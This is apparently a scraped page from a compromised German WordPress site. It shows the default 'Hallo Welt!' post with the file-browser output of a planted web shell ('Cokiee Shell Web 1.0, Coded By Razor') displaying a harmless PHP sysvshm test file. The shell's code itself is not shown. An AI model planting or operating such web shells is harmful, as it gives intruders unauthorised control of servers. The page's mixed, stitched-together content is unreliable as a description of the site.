Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/sysvshm/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/sysvshm/tests/shutdown_crash_0.phpt |
--TEST-- Shutdown crash when attached/removed same key segment multiple times --SKIPIF-- <?php if (!extension_loaded("sysvshm")){ print 'skip'; } ?> --FILE-- <?php /*$key = ftok(__FILE__, 't'); var_dump($key);*/ $key = 42; var_dump($s = shm_attach($key, 1024)); shm_remove($s); var_dump($s = shm_attach($key, 1024)); shm_remove($s); --EXPECTF-- resource(%d) of type (sysvshm) resource(%d) of type (sysvshm)
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare